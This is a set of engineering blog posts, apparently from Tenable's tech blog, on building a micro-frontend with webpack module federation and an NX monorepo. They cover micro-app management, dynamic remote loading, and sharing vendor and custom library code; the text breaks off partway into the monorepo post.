As discussed in the previous article, sharing code is critical to using module federation successfully. In the last article we focused on sharing vendor code. Now, we want to take those same principles and apply them to the custom library code we have living in the libs directory. As illustrated below, App A and B both use Lib 1. When these micro-apps are built, they each contain a version of that library within their build artifact.
Assuming you read the previous article, you now know why this is important. As shown in the diagram below, when App A is loaded in, it pulls down all the libraries shown. When App B is loaded in, it does the same thing. The problem is once again that App B is pulling down duplicate libraries that App A has already loaded.
The Solution
Similar to the vendor libraries approach, we need to tell module federation that we would like to share these custom libraries. This way, once we load App B, it first checks what App A has already loaded and leverages any libraries it can. If it needs a library that hasn’t been loaded yet (or the version it needs isn’t compatible with the version App A loaded), it proceeds to load its own copy. And if it’s the only micro-app using a given library, it simply bundles a version of that library within itself (ex. Lib 2).
Diving Deeper
Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn more about sharing custom library code between your micro-apps. If you wish to see the code associated with the following section, you can check it out in this branch.
To demonstrate sharing libraries, we’re going to focus on Test Component 1 that is imported by the Host and Application 1:
This particular component lives in the design-system/components workspace:
We leverage the tsconfig.base.json file to build out our aliases dynamically based on the component paths defined in that file. This is an easy way to ensure that as new paths are added to your libraries, they are automatically picked up by webpack:
How does webpack currently treat this library code? If we were to investigate the network traffic before sharing anything, we would see that the code for this component is embedded in two separate files specific to both Host and Application 1 (the code specific to Host is shown below as an example). At this point the code is not shared in any way and each application simply pulls the library code from its own bundle.
As your application grows, so does the amount of code you share. At a certain point, it becomes a performance issue when each application pulls in its own unique library code. We’re now going to update the shared property of the ModuleFederationPlugin to include these custom libraries.
Sharing our custom libraries is similar to sharing the vendor libraries discussed in the previous article. However, the mechanism for defining a version is different. With vendor libraries, we were able to rely on the versions defined in the package.json file. Our custom libraries don’t have this concept (though you could technically introduce something like that if you wanted). To solve this problem, we decided to use a unique identifier as the library version. Specifically, when we build a particular library, we look at the folder containing it and generate a unique hash based on the contents of the directory. This way, if the contents of the folder change, so does the version. By doing this, we can ensure micro-apps only share custom libraries when the contents of the library match.
Note: We are once again leveraging the tsconfig.base.json to dynamically build out the libs that should be shared. We used a similar approach above for building out our aliases.
If we investigate the network traffic again and look for libs_design-system_components (webpack’s filename for the import from @microfrontend-demo/design-system/components), we can see that this particular library has now been split into its own individual file. Furthermore, only one version gets loaded by the Host application (port 3000). This indicates that we are now sharing the code from @microfrontend-demo/design-system/components between the micro-apps.
Going More Granular
Before You Proceed: If you wish to see the code associated with the following section, you can check it out in this branch.
Currently, when we import one of the test components, it comes from the index file shown below. This means the code for all three of these components gets bundled together into the single file shown above as “libs_design-system_components_src_index…”.
Imagine that we continue to add more components:
You may get to a certain point where you think it would be beneficial to not bundle these files together into one big file. Instead, you want to import each individual component. Since the alias configuration in webpack is already leveraging the paths in the tsconfig.base.json file to build out these aliases dynamically (discussed above), we can simply update that file and provide all the specific paths to each component:
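A sketch of how such per-component path entries could be generated rather than written by hand; the scope and directory layout mirror the demo names above but are assumptions:

```javascript
// granular-paths.js: sketch of expanding a component list into per-component
// tsconfig path entries so each component can be imported (and shared) individually.
function buildGranularPaths(scope, workspaceDir, components) {
  const paths = {};
  for (const name of components) {
    // ex. "@microfrontend-demo/design-system/components/test-component-1"
    //  -> ["libs/design-system/components/src/test-component-1/index.ts"]
    paths[`${scope}/${name}`] = [`${workspaceDir}/src/${name}/index.ts`];
  }
  return paths;
}

module.exports = { buildGranularPaths };
```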
We can now import each one of these individual components:
If we investigate our network traffic, we can see that each one of those imports gets broken out into its own individual file:
This approach has several pros and cons that we discovered along the way:
Pros
- Less Code To Pull Down — By making each individual component a direct import and by listing the component in the shared array of the ModuleFederationPlugin, we ensure that the micro-apps share as much library code as possible.
- Only The Code That Is Needed Is Used — If a micro-app only needs to use one or two of the components in a library, they aren’t penalized by having to import a large bundle containing more than they need.
Cons
- Performance — Bundling, the process of taking a number of separate files and consolidating them into one larger file, is a really good thing. If you continue down the granular path for everything in your libraries, you may very well find yourself in a scenario where you are importing hundreds of files in the browser. When it comes to browser performance and caching, there’s a balance to loading a lot of small granular files versus a few larger ones that have been bundled.
We recommend you choose the solution that works best for your codebase. For some applications, going granular is an ideal solution and leads to the best performance. For others it could be a very bad decision, leaving your customers pulling down a ton of granular files when it would have made more sense to have them pull down one larger file. As we did, you’ll want to do your own performance analysis and use that as the basis for your approach.
Pitfalls
When it came to the code in our libs directory, we discovered two important things along the way that you should be aware of.
Hybrid Sharing Leads To Bloat — When we first started using module federation, we had a library called tenable-io/common. This was a relic of our initial architecture and essentially housed all the shared code that our various applications used. Since this was originally a directory (and not a library), our imports from it varied quite a bit. As shown below, at times we imported from the main index file of tenable-io/common (tenable-io/common.js), but in other instances we imported from subdirectories (ex. tenable-io/common/component.js) and even specific files (ex. tenable-io/common/component1.js). To avoid updating all of these import statements to use a consistent approach (ex. only importing from the index of tenable-io/common), we opted to expose every single file in this directory and share it via module federation.
To demonstrate why this was a bad idea, we’ll walk through each of these import types: starting from the most global in nature (importing the main index file) and moving towards the most granular (importing a specific file). As shown below, the application begins by importing the main index file which exposes everything in tenable-io/common. This means that when webpack bundles everything together, one large file is created for this import statement that contains everything (we’ll call it common.js).
We then move down a level in our import statements and import from subdirectories within tenable-io/common (components and utilities). Similar to our main index file, these import statements contain everything within their directories. Can you see the problem? This code is already contained in the common.js file above. We now have bloat in our system that causes the customer to pull down more javascript than necessary.
We now get to the most granular import statement where we’re importing from a specific file. At this point, we have a lot of bloat in our system as these individual files are already contained within both import types above.
As you can imagine, this can have a dramatic impact on the performance of your application. For us, this was evident in our application early on and it was not until we did a thorough performance analysis that we discovered the culprit. We highly recommend you evaluate the structure of your libraries and determine what’s going to work best for you.
Sharing State/Storage/Theme — While we tried to keep our micro-apps as independent of one another as possible, we did have instances where we needed them to share state and theming. Typically, shared code lives in an actual file (some-file.js) that resides within a micro-app’s bundle. For example, let’s say we have a notifications library shared between the micro-apps. In the first update, the presentation portion of this library is updated. However, only App B gets deployed to production with the new code. In this case, that’s okay because the code is constrained to an actual file. In this instance, App A and B will use their own versions within each of their bundles. As a result, they can both operate independently without bugs.
However, when it comes to things like state (Redux for us), storage (window.storage, document.cookies, etc.) and theming (styled-components for us), you cannot rely on this. This is because these items live in memory and are shared at a global level, which means you can’t rely on them being confined to a physical file. To demonstrate this, let’s say that we’ve made a change to the way state is getting stored and accessed. Specifically, we went from storing our notifications under an object called notices to storing them under notifications. In this instance, once our applications get out of sync on production (i.e. they’re not leveraging the same version of shared code where this change was made), the applications will attempt to store and access notifications in memory in two different ways. If you are looking to create challenging bugs, this is a great way to do it.
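A tiny sketch makes the failure mode concrete. Assume a global in-memory store and two apps deployed out of sync: one still writes the old notices key while the other reads the new notifications key (names taken from the example above; the store and helpers are hypothetical):

```javascript
// Sketch: why out-of-sync shared state breaks. App A ships code that writes the
// old key; App B ships code (with the rename) that reads the new key.
const sharedStore = {}; // stands in for a global in-memory store (Redux, window, …)

function appAAddNotification(message) {
  // App A was built before the rename and still writes "notices".
  (sharedStore.notices = sharedStore.notices || []).push(message);
}

function appBGetNotifications() {
  // App B was built after the rename and reads "notifications".
  return sharedStore.notifications || []; // silently misses App A's writes
}
```

Neither app throws an error; App B just silently sees no notifications, which is exactly the kind of challenging bug described above.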
As we soon discovered, most of our bugs/issues resulting from this new architecture came as a result of updating one of these areas (state, theme, storage) and allowing the micro-apps to deploy at their own pace. In these instances, we needed to ensure that all the micro-apps were deployed at the same time to ensure the applications and the state, store, and theming were all in sync. You can read more about how we handled this via a Jenkins bootstrapper job in the next article.
Summary
At this point you should have a fairly good grasp on how both vendor libraries and custom libraries are shared in the module federation system. See the next article in the series to learn how we build and deploy our application.
7. Module Federation — Sharing Library Code was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.
6. Module Federation — Sharing Vendor Code
Module Federation — Sharing Vendor Code
This is post 6 of 9 in the series
- Introduction
- Why We Implemented a Micro Frontend
- Introducing the Monorepo & NX
- Introducing Module Federation
- Module Federation — Managing Your Micro-Apps
- Module Federation — Sharing Vendor Code
- Module Federation — Sharing Library Code
- Building & Deploying
- Summary
Overview
This article focuses on the importance of sharing vendor library code between applications and some related best practices.
The Problem
One of the most important aspects of using module federation is sharing code. When a micro-app gets built, it contains all the files it needs to run. As stated by webpack, “These separate builds should not have dependencies between each other, so they can be developed and deployed individually”. In reality, this means if you build a micro-app and investigate the files, you will see that it has all the code it needs to run independently. In this article, we’re going to focus on vendor code (the code coming from your node_modules directory). However, as you’ll see in the next article of the series, this also applies to your custom libraries (the code living in libs). As illustrated below, App A and B both use vendor lib 6, and when these micro-apps are built they each contain a version of that library within their build artifact.
Why is this important? We’ll use the diagram below to demonstrate. Without sharing code between the micro-apps, when we load in App A, it loads in all the vendor libraries it needs. Then, when we navigate to App B, it also loads in all the libraries it needs. The issue is that we’ve already loaded in a number of libraries when we first loaded App A that could have been leveraged by App B (ex. Vendor Lib 1). From a customer perspective, this means they’re now pulling down a lot more Javascript than they should be.
The Solution
This is where module federation shines. By telling module federation what should be shared, the micro-apps can now share code between themselves when appropriate. Now, when we load App B, it’s first going to check and see what App A already loaded in and leverage any libraries it can. If it needs a library that hasn’t been loaded in yet (or the version it needs isn’t compatible with the version App A loaded in), then it proceeds to load its own. For example, App A needs Vendor lib 5, but since no other application is using that library, there’s no need to share it.
Sharing code between the micro-apps is critical for performance and ensures that customers are only pulling down the code they truly need to run a given application.
Diving Deeper
Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn more about sharing vendor code between your micro-apps. If you wish to see the code associated with the following section, you can check it out in this branch.
Now that we understand how libraries are built for each micro-app and why we should share them, let’s see how this actually works. The shared property of the ModuleFederationPlugin is where you define the libraries that should be shared between the micro-apps. Below, we are passing a variable called npmSharedLibs to this property:
If we print out the value of that variable, we’ll see the following:
This tells module federation that these three libraries should be shared as singletons. For libraries like react, loading a second copy could actually break our application, so setting singleton to true ensures that only one version of the library is ever loaded (note: this property will not be needed for most libraries). You’ll also notice we set a version, which comes from the version defined for the given library in our package.json file. This is important because any time we update a library, that version changes dynamically. Libraries only get shared if their versions are compatible. You can read more about these properties here.
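As an illustration, a map like npmSharedLibs could be produced along these lines; the helper and the exact library list are assumptions, not our exact code:

```javascript
// shared-libs.js: sketch of building the "shared" map handed to ModuleFederationPlugin.
// Versions are read from package.json dependencies so they track updates automatically.
function buildSharedConfig(dependencies, singletonNames) {
  const shared = {};
  for (const name of singletonNames) {
    shared[name] = {
      singleton: true, // a second copy of e.g. react would break the app
      requiredVersion: dependencies[name], // version straight from package.json
    };
  }
  return shared;
}

module.exports = { buildSharedConfig };
```

In a webpack config this would be used roughly as buildSharedConfig(require('./package.json').dependencies, ['react', 'react-dom', 'styled-components']), with the result passed to the plugin’s shared property.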
If we spin up the application and investigate the network traffic with a focus on the react library, we’ll see that only one file gets loaded in and it comes from port 3000 (our Host application). This is a result of defining react in the shared property:
Now let’s take a look at a vendor library that hasn’t been shared yet, called @styled-system/theme-get. If we investigate our network traffic, we’ll discover that this library gets embedded into a vendor file for each micro-app. The three files highlighted below come from each of the micro-apps. You can imagine that as your libraries grow, the size of these vendor files may get quite large, and it would be better if we could share these libraries.
We will now add this library to the shared property:
If we investigate the network traffic again and search for this library, we’ll see it has been split into its own file. In this case, the Host application (which loads before everything else) loads in the library first (we know this since the file is coming from port 3000). When the other applications load in, they determine that they don’t have to use their own version of this library since it’s already been loaded in.
This very significant feature of module federation is critical for an architecture like this to succeed from a performance perspective.
Summary
Sharing code is one of the most important aspects of using module federation. Without this mechanism in place, your application would suffer from performance issues as your customers pulled down duplicate code each time they accessed a different micro-app. Using the approaches above, you can ensure that your micro-apps are independent but also capable of sharing code between themselves when appropriate. This is the best of both worlds, and it is what allows a micro-frontend architecture to succeed. Now that you understand how vendor libraries are shared, we can take the same principles and apply them to our self-created libraries that live in the libs directory, which we discuss in the next article of the series.
6. Module Federation — Sharing Vendor Code was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.
5. Module Federation — Managing Your Micro-Apps
Module Federation — Managing Your Micro-Apps
This is post 5 of 9 in the series
- Introduction
- Why We Implemented a Micro Frontend
- Introducing the Monorepo & NX
- Introducing Module Federation
- Module Federation — Managing Your Micro-Apps
- Module Federation — Sharing Vendor Code
- Module Federation — Sharing Library Code
- Building & Deploying
- Summary
Overview
The Problem
When you first start using module federation and only have one or two micro-apps, managing the configurations for each app and the various ports they run on is simple.
As you progress and continue to add more micro-apps, you may start running into issues with managing all of these micro-apps. You will find yourself repeating the same configuration over and over again. You’ll also find that the Host application needs to know which micro-app is running on which port, and you’ll need to avoid serving a micro-app on a port already in use.
The Solution
To reduce the complexity of managing these various micro-apps, we consolidated our configurations and the serve command (to spin up the micro-apps) into a central location within a newly created tools directory:
Diving Deeper
Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn more about how we dealt with managing an ever growing number of micro-apps. If you wish to see the code associated with the following section, you can check it out in this branch.
The Serve Command
One of the most important things we did here was create a serve.js file that allowed us to build/serve only those micro-apps an engineer needed to work on. This increased the speed at which our engineers got the application running, while also consuming as little local memory as possible. Below is a general breakdown of what that file does:
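The flag handling in a serve script like this can be sketched as follows; the function and its defaults are assumptions for illustration, with the flags matching the examples later in this section:

```javascript
// serve-args.js: sketch of deciding which micro-apps to build and serve based
// on the --apps, --appOnly and --all flags of a serve script.
function resolveAppsToServe(argv, allApps, hostName = 'host') {
  if (argv.all) return allApps; // --all: spin up everything
  const requested = argv.apps ? argv.apps.split(',') : [];
  // --appOnly skips rebuilding Host when it is already running;
  // otherwise Host is always included (and is the default with no flags).
  return argv.appOnly ? requested : [hostName, ...requested];
}

module.exports = { resolveAppsToServe };
```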
You can see in our webpack configuration below where we send the ready message (line 193). The serve command above listens for that message (line 26 above) and uses it to keep track of when a particular micro-app is done compiling.
Remote Utilities
Additionally, we created some remote utilities that allowed us to consistently manage our remotes. Specifically, it would return the name of the remotes along with the port they should run on. As you can see below, this logic is based on the workspace.json file. This was done so that if a new micro-app was added it would be automatically picked up without any additional configuration by the engineer.
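In sketch form, such a utility might look like this; the base port, and the assumption that remotes get sequential ports after Host (3000), are ours for illustration:

```javascript
// remote-utils.js: sketch of deriving each remote's name and dev-server port
// from workspace.json, so new micro-apps are picked up with no extra configuration.
const BASE_PORT = 3000; // assumption: Host runs on 3000, remotes take the ports after it

function getRemotes(workspace, hostName = 'host') {
  return Object.keys(workspace.projects)
    .filter((name) => name !== hostName) // Host is not a remote
    .sort() // stable ordering means stable port assignment
    .map((name, index) => ({ name, port: BASE_PORT + index + 1 }));
}

module.exports = { getRemotes };
```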
Putting It All Together
Why was all this necessary? One of the powerful features of module federation is that all micro-apps are capable of being built independently. This was the purpose of the serve script shown above: it enabled us to spin up a series of micro-apps based on our needs. For example, with this logic in place, we could accommodate a variety of engineering needs:
- Host only — If we wanted to spin up the Host application we could run npm run serve (the command defaults to spinning up Host).
- Host & Application1 — If we wanted to spin up both Host and Application1, we could run npm run serve --apps=application-1.
- Application2 Only — If we already had the Host and Application1 running, and we now wanted to spin up Application2 without having to rebuild things, we could run npm run serve --apps=application-2 --appOnly.
- All — If we wanted to spin up everything, we could run npm run serve --all.
You can easily imagine that as your application grows and your codebase gets larger and larger, this type of functionality can be extremely powerful since you only have to build the parts of the application related to what you’re working on. This allowed us to speed up our boot time by 2x and our rebuild time by 7x, which was a significant improvement.
Note: If you use Visual Studio Code, you can accomplish some of this same functionality through the NX Console extension.
Loading Your Micro-Apps — The Static Approach
In the previous article, when it came to importing and using Application 1 and 2, we simply imported the micro-apps at the top of the bootstrap file and hard coded the remote entries in the index.html file:
However, in the real world, this is not the best approach. The moment your application runs, it is forced to load the remote entry files for every single micro-app. For a real-world application with many micro-apps, this means the performance of your initial load will most likely suffer. Additionally, loading in all the micro-apps as we’re doing in the index.html file above is not very flexible. Imagine some of your micro-apps are behind feature flags that only certain customers can access. In that case, it would be much better if the micro-apps could be loaded dynamically, only when a particular route is hit.
In our initial approach with this new architecture, we made this mistake and paid for it from a performance perspective. We noticed that as we added more micro-apps, our initial load was getting slower. We finally discovered the issue was related to the fact that we were loading in our remotes using this static approach.
Loading Your Micro-Apps — The Dynamic Approach
Leveraging the remote utilities we discussed above, you can see how we pass the remotes and their associated ports in the webpack build via the REMOTE_INFO property. This global property will be accessed later on in our code when it’s time to load the micro-apps dynamically.
Once we had the information we needed for the remotes (via the REMOTE_INFO variable), we updated our bootstrap.jsx file to leverage a new component, discussed below, called <MicroApp />. The purpose of this component was to dynamically attach the remote entry to the page and then initialize the micro-app lazily so it could be leveraged by Host. You can see the actual component never gets loaded until we hit a path where it is needed. This ensures that a given micro-app is never loaded until it’s actually needed, leading to a huge boost in performance.
The actual logic of the <MicroApp /> component is highlighted below. This approach is a variation of the example shown here. In a nutshell, this logic dynamically injects the <script src="…remoteEntry.js"></script> tag into the index.html file when needed, and initializes the remote. Once initialized, the remote and any exposed component can be imported by the Host application like any other import.
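The core of that logic can be sketched as follows, based on webpack’s documented dynamic-remotes pattern. The runtime hooks are injected as parameters here so the sketch stays testable outside a browser; in real code they are the __webpack_init_sharing__ / __webpack_share_scopes__ globals, a script-injecting loader, and window[scope]:

```javascript
// load-remote.js: sketch of dynamically loading a federated remote, following
// webpack's dynamic-remotes pattern. All dependencies are injected for testability.
async function loadRemoteModule(scope, modulePath, runtime) {
  const { loadScript, initSharing, shareScopes, getContainer } = runtime;
  await loadScript(scope);      // attach <script src=".../remoteEntry.js"> for this remote
  await initSharing('default'); // populate the default share scope with host libraries
  const container = getContainer(scope); // e.g. window[scope] in the browser
  await container.init(shareScopes.default); // hand the share scope to the remote
  const factory = await container.get(modulePath); // fetch the exposed module factory
  return factory();
}

module.exports = { loadRemoteModule };
```

A <MicroApp /> component can then await loadRemoteModule inside a lazy import and render whatever the remote exposes.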
Summary
By making the changes above, we were able to significantly improve our overall performance. We did this by only loading in the code we needed for a given micro-app at the time it was needed (versus everything at once). Additionally, when our team added a new micro-app, our script was capable of handling it automatically. This approach allowed our teams to work more efficiently, and allowed us to significantly reduce the initial load time of our application. See the next article to learn about how we dealt with our vendor libraries.
5. Module Federation — Managing Your Micro-Apps was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.
4. Introducing Module Federation
Introducing Module Federation
This is post 4 of 9 in the series
- Introduction
- Why We Implemented a Micro Frontend
- Introducing the Monorepo & NX
- Introducing Module Federation
- Module Federation — Managing Your Micro-Apps
- Module Federation — Sharing Vendor Code
- Module Federation — Sharing Library Code
- Building & Deploying
- Summary
Overview
As discussed in the previous article, the first step in updating our architecture involved the consolidation of our two repositories into one and the introduction of the NX framework. Once this phase was complete, we were ready to move to the next phase: the introduction of module federation for the purposes of breaking our Tenable.io application into a series of micro-apps.
The Problem
Before we dive into what module federation is and why we used it, it’s important to first understand the problem we wanted to solve. As demonstrated in the following diagram, multiple teams were responsible for individual parts of the Tenable.io application. However, regardless of the update, everything went through the same build and deployment pipeline once the code was merged to master. This created a natural bottleneck where each team was reliant on any change made previously by another team.
This was problematic for a number of reasons:
- Bugs — Imagine your team needs to deploy an update to customers for your particular application as quickly as possible. However, another team introduced a relatively significant bug that should not be deployed to production. In this scenario, you either have to wait for the other team to fix the bug or release the code to production while knowingly introducing the bug. Neither of these are good options.
- Slow to lint, test and build — As discussed previously, as an application grows in size, things such as linting, testing, and building inevitably get slower as there is simply more code to deal with. This has a direct impact on your automation server/delivery pipeline (in our case Jenkins) because the pipeline will most likely get slower as your codebase grows.
- E2E Testing Bottleneck — End-to-end tests are an important part of an enterprise application to ensure bugs are caught before they make their way to production. However, running E2E tests for your entire application can cause a massive bottleneck in your pipeline as each build must wait on the previous build to finish before proceeding. Additionally, if one team's E2E tests fail, they block the other teams' changes from making it to production. This was a significant bottleneck for us.
The Solution
Let’s discuss why module federation was the solution for us. First, what exactly is module federation? In a nutshell, it is webpack’s way of implementing a micro-frontend (though it’s not limited to only implementing frontend systems). More specifically, it enables us to break apart our application into a series of smaller applications that can be developed and deployed individually, and then put back together into a single application. Let’s analyze how our deployment model above changes with this new approach.
As shown below, multiple teams were still responsible for individual parts of the Tenable.io application. However, you can see that each individual application within Tenable.io (the micro-apps) has its own Jenkins pipeline where it can lint, test, and build the code related to that individual application. But how do we know which micro-app was impacted by a given change? We rely on the NX framework discussed in the previous article. As a result of this new model, the bottleneck shown above is no longer an issue.
Diving Deeper
Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn more about how module federation works and the way in which things can be set up. If you wish to see the code associated with the following section, you can check it out in this branch.
Diagrams are great, but what does a system like this actually look like from a code perspective? We will build off the demo from the previous article to introduce module federation for the Tenable.io application.
Workspaces
One of the very first changes we made was to our NX workspaces. New workspaces are created via the npx create-nx-workspace command. For our purposes, the intent was to split up the Tenable.io application (previously its own workspace) into three individual micro-apps:
- Host — Think of this as the wrapper for the other micro-apps. Its primary purpose is to load in the micro-apps.
- Application 1 — Previously, this was apps/tenable-io/src/app/app-1.tsx. We are now going to transform this into its own individual micro-app.
- Application 2 — Previously, this was apps/tenable-io/src/app/app-2.tsx. We are now going to transform this into its own individual micro-app.
This simple diagram illustrates the relationship between the Host and micro-apps:
Let’s analyze a before and after of our workspace.json file that shows how the tenable-io workspace (line 5) was split into three (lines 4–6).
Before (line 5)
After (lines 4–6)
Note: When using module federation, there are a number of different architectures you can leverage. In our case, a host application that loaded in the other micro-apps made the most sense for us. However, you should evaluate your needs and choose the one that's best for you. This article does a good job of breaking these options down.
Workspace Commands
Now that we have these three new workspaces, how exactly do we run them locally? If you look at the previous demo, you’ll see our serve command for the Tenable.io application leveraged the @nrwl/web:dev-server executor. Since we’re going to be creating a series of highly customized webpack configurations, we instead opted to leverage the @nrwl/workspace:run-commands executor. This allowed us to simply pass a series of terminal commands that get run. For this initial setup, we’re going to leverage a very simple approach to building and serving the three applications. As shown in the commands below, we simply change directories into each of these applications (via cd apps/…), and run the npm run dev command that is defined in each of the micro-app’s package.json file. This command starts the webpack dev server for each application.
At this point, if we run nx serve host (serve being one of the targets defined for the host workspace) it will kick off the three commands shown on lines 10–12. Later in the article, we will show a better way of managing multiple webpack configurations across your repository.
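A sketch of what such a serve target could look like in workspace.json — the executor and option names follow the @nrwl/workspace:run-commands executor, but the directory layout is an assumption based on the demo described above:

```json
{
  "host": {
    "root": "apps/host",
    "targets": {
      "serve": {
        "executor": "@nrwl/workspace:run-commands",
        "options": {
          "commands": [
            "cd apps/host && npm run dev",
            "cd apps/application1 && npm run dev",
            "cd apps/application2 && npm run dev"
          ],
          "parallel": true
        }
      }
    }
  }
}
```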
Webpack Configuration — Host
The following configuration shows a pretty bare bones implementation for our Host application. We have explained the various areas of the configuration and their purpose. If you are new to webpack, we recommend you read through their getting started documentation to better understand how webpack works.
Some items of note include:
- ModuleFederationPlugin — This is what enables module federation. We’ll discuss some of the sub properties below.
- remotes — This is the primary difference between the host application and the applications it loads in (application 1 and 2). We define application1 and application2 here. This tells our host application that there are two remotes that exist and that can be loaded in.
- shared — One of the concepts you’ll need to get used to in module federation is the concept of sharing resources. Without this configuration, webpack will not share any code between the various micro-applications. This means that if application1 and application2 both import react, they each will use their own versions. Certain libraries (like the ones defined here) only allow you to load one version of the library for your application. This can cause your application to break if the library gets loaded in more than once. Therefore, we ensure these libraries are shared and only one version gets loaded in.
- devServer — Each of our applications has this configured, and it serves each of them on their own unique port. Note the addition of the Access-Control-Allow-Origin header: this is critical for dev mode to ensure the host application can access other ports that are running our micro-applications.
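Putting those pieces together, a bare-bones host configuration might look like the sketch below. The ports, filenames, and shared library list are assumptions for illustration; `ModuleFederationPlugin` and its `remotes`/`shared` options are part of webpack 5 proper:

```javascript
// apps/host/webpack.config.js — minimal sketch
const { ModuleFederationPlugin } = require('webpack').container;

module.exports = {
  entry: './src/index.js',
  mode: 'development',
  devServer: {
    port: 3000,
    // Critical in dev mode: lets the host fetch remote entries served
    // from the other micro-app ports.
    headers: { 'Access-Control-Allow-Origin': '*' },
  },
  plugins: [
    new ModuleFederationPlugin({
      name: 'host',
      // Tell the host which remotes exist and where their entries live.
      remotes: {
        application1: 'application1@http://localhost:3001/remoteEntry.js',
        application2: 'application2@http://localhost:3002/remoteEntry.js',
      },
      // Share singleton libraries so only one copy is ever loaded.
      shared: {
        react: { singleton: true },
        'react-dom': { singleton: true },
      },
    }),
  ],
};
```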
Webpack Configuration — Application
The configurations for application1 and application2 are nearly identical to the one above, with the exception of the ModuleFederationPlugin. Our applications are responsible for determining what they want to expose to the outside world. The exposes property of the ModuleFederationPlugin defines a public API that determines which files the Host application can consume when it imports from either of these. In our case, we only expose the index file ('.') in the src directory. You'll see we're not defining any remotes, and this is intentional: in our setup, we want to prevent micro-applications from importing resources from each other; if they need to share code, it should come from the libs directory.
In this demo, we’re keeping things as simple as possible. However, you can expose as much or as little as you want based on your needs. So if, for example, we wanted to expose an individual component, we could do that using the following syntax:
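A sketch of what a more granular exposes configuration might look like (the component path and name here are hypothetical):

```javascript
// apps/application1/webpack.config.js — plugin section only, sketch
const { ModuleFederationPlugin } = require('webpack').container;

new ModuleFederationPlugin({
  name: 'application1',
  filename: 'remoteEntry.js',
  exposes: {
    // The whole index, as in the demo.
    '.': './src/index',
    // A single component: the host could then do
    // `import Button from 'application1/Button'`.
    './Button': './src/components/button',
  },
});
```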
Initial Load
When we run nx serve host, what happens? The entry point for our host application is the index.js file shown below. This file imports another file called bootstrap.js. This approach avoids the error "Shared module is not available for eager consumption," which you can read more about here.
The bootstrap.js file is the real entry point for our Host application. We are able to import Application1 and Application2 and load them in like a normal component (lines 15–16):
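A sketch of the two files involved — the module names match the remotes defined in the host's webpack configuration, while the wrapper markup is an assumption:

```javascript
// index.js — sketch: the entry pulls in bootstrap asynchronously so
// webpack can negotiate shared modules before any app code runs.
import('./bootstrap');

// bootstrap.js — sketch: the real entry point, importing the remotes
// like any other component.
import React from 'react';
import ReactDOM from 'react-dom';
import Application1 from 'application1';
import Application2 from 'application2';

ReactDOM.render(
  <div>
    <Application1 />
    <Application2 />
  </div>,
  document.getElementById('root')
);
```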
Note: Had we exposed more specific files as discussed above, our import would be more granular in nature:
At this point, you might think we’re done. However, if you ran the application you would get the following error message, which tells us that the import on line 15 above isn’t working:
Loading The Remotes
To understand why this is, let’s take a look at what happens when we build application1 via the webpack-dev-server command. When this command runs, it actually serves this particular application on port 3001, and the entry point of the application is a file called remoteEntry.js. If we actually go to that port/file, we’ll see something that looks like this:
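The generated file is large, but its essential shape can be sketched like this (a heavily simplified illustration, not the actual generated code): a global container object exposing `get` and `init` functions.

```javascript
// Rough shape of what remoteEntry.js sets up for application1.
var application1 = (() => {
  const moduleMap = {
    // '.' corresponds to the exposed index in the ModuleFederationPlugin config.
    '.': () => Promise.resolve(() => 'exports of src/index'),
  };
  return {
    // Fetch the factory for an exposed module.
    get(module) {
      return moduleMap[module]();
    },
    // Wire up shared dependencies (react, react-dom, ...) into the
    // provided share scope. A no-op in this sketch.
    init(shareScope) {},
  };
})();
```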
In the module federation world, application 1 & 2 are called remotes. According to their documentation, “Remote modules are modules that are not part of the current build and loaded from a so-called container at the runtime”. This is how module federation works under the hood, and is the means by which the Host can load in and interact with the micro-apps. Think of the remote entry file shown above as the public interface for Application1, and when another application loads in the remoteEntry file (in our case Host), it can now interact with Application1.
We know application 1 and 2 are getting built, and they're being served up at ports 3001 and 3002. So why can't the Host find them? The issue is that we haven't actually done anything to load in those remote entry files. To make that happen, we have to open up the public/index.html file and add those remote entry files in:
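With the static approach, that amounts to something like the following (a sketch of the host's public/index.html; ports match the dev servers above):

```html
<!DOCTYPE html>
<html>
  <head>
    <!-- Statically pull in each remote entry file -->
    <script src="http://localhost:3001/remoteEntry.js"></script>
    <script src="http://localhost:3002/remoteEntry.js"></script>
  </head>
  <body>
    <div id="root"></div>
  </body>
</html>
```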
Now if we run the host application and investigate the network traffic, we’ll see the remoteEntry.js file for both application 1 and 2 get loaded in via ports 3001 and 3002:
Summary
At this point, we have covered a basic module federation setup. In the demo above, we have a Host application that is the main entry point for our application. It is responsible for loading in the other micro-apps (application 1 and 2). As we implemented this solution for our own application we learned a number of things along the way that would have been helpful to know from the beginning. See the following articles to learn more about the intricacies of using module federation:
- Module Federation — Managing Your Micro-Apps — How we dealt with managing an ever growing number of micro-apps and their associated configurations.
- Module Federation — Sharing Vendor Code — Learn the importance of sharing vendor code between your micro-apps.
- Module Federation — Sharing Library Code — Learn the importance of sharing your custom library code between your micro-apps.
4. Introducing Module Federation was originally published in Tenable TechBlog on Medium.
3. Introducing The Monorepo & NX
Introducing The Monorepo & NX
This is post 3 of 9 in the series
- Introduction
- Why We Implemented a Micro Frontend
- Introducing the Monorepo & NX
- Introducing Module Federation
- Module Federation — Managing Your Micro-Apps
- Module Federation — Sharing Vendor Code
- Module Federation — Sharing Library Code
- Building & Deploying
- Summary
Overview
In this next phase of our journey, we created a monorepo built off the NX framework. The focus of this article is on how we leverage NX to identify which part of the repository changed, allowing us to only rebuild that portion. As discussed in the previous article, our teams were plagued by a series of issues that we believed could be solved by moving towards a new architecture. Before we dive into the first phase of this new architecture, let’s recap one of the issues we were facing and how we solved it during this first phase.
The Problem
Our global components lived in an entirely different repository, where they had to be published and pulled down through a versioning system. To do this, we leveraged Lerna and Nexus, which is similar to how third-party npm packages are deployed and utilized. As a result of this model, we constantly dealt with issues pertaining to component isolation and breaking changes.
To address these issues, we wanted to consolidate the Design System and Tenable.io repositories into one. To ensure our monorepo would be fast and efficient, we also introduced the NX framework to only rebuild parts of the system that were impacted by a change.
The Solution
The Monorepo Is Born
The first step in updating our architecture was to bring the Design System into the Tenable.io repository. This involved the following:
- Design System components — The components themselves were broken apart into a series of subdirectories that all lived under libs/design-system. In this way, they could live alongside our other Tenable.io specific libraries.
